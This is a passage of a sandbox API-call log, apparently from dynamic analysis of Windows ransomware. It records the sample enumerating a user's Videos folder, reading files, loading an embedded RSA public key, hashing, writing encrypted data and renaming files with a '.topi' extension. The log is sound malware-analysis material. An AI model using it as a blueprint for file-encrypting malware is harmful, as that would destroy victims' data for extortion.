[0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5048 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbad0 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x73db, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x73db, lpOverlapped=0x0) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.879] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x73e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.880] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.880] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.880] CloseHandle (hObject=0x6a8) returned 1 [0097.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.882] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Jf1OVe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\jf1ove.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Jf1OVe.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\jf1ove.mp4.topi")) returned 1 [0097.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.883] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.884] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeb7cb20, ftCreationTime.dwHighDateTime=0x1d5bb33, ftLastAccessTime.dwLowDateTime=0x800cd4e0, ftLastAccessTime.dwHighDateTime=0x1d5beaa, ftLastWriteTime.dwLowDateTime=0x800cd4e0, ftLastWriteTime.dwHighDateTime=0x1d5beaa, nFileSizeHigh=0x0, nFileSizeLow=0xa834, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qk-VAoV_f.swf", cAlternateFileName="QK-VAO~1.SWF")) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f248 [0097.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f248 | out: hHeap=0x680000) returned 1 [0097.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Qk-VAoV_f.swf") returned=".swf" [0097.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Qk-VAoV_f.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\qk-vaov_f.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.884] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=43060) returned 1 [0097.884] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.887] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa80e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.887] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.888] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.888] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xa834, lpOverlapped=0x0) returned 1 [0097.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.888] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.889] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.889] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.889] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.889] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.889] GetLastError () returned 0x0 [0097.889] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.889] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.889] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.889] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.890] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa830) returned 0x9a06a00 [0097.890] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbad0 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbb18 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.890] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5048 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5030 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.891] GetCurrentThreadId () returned 0x8c4 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa580 [0097.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.892] GetCurrentThreadId () returned 0x8c4 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.893] HeapFree 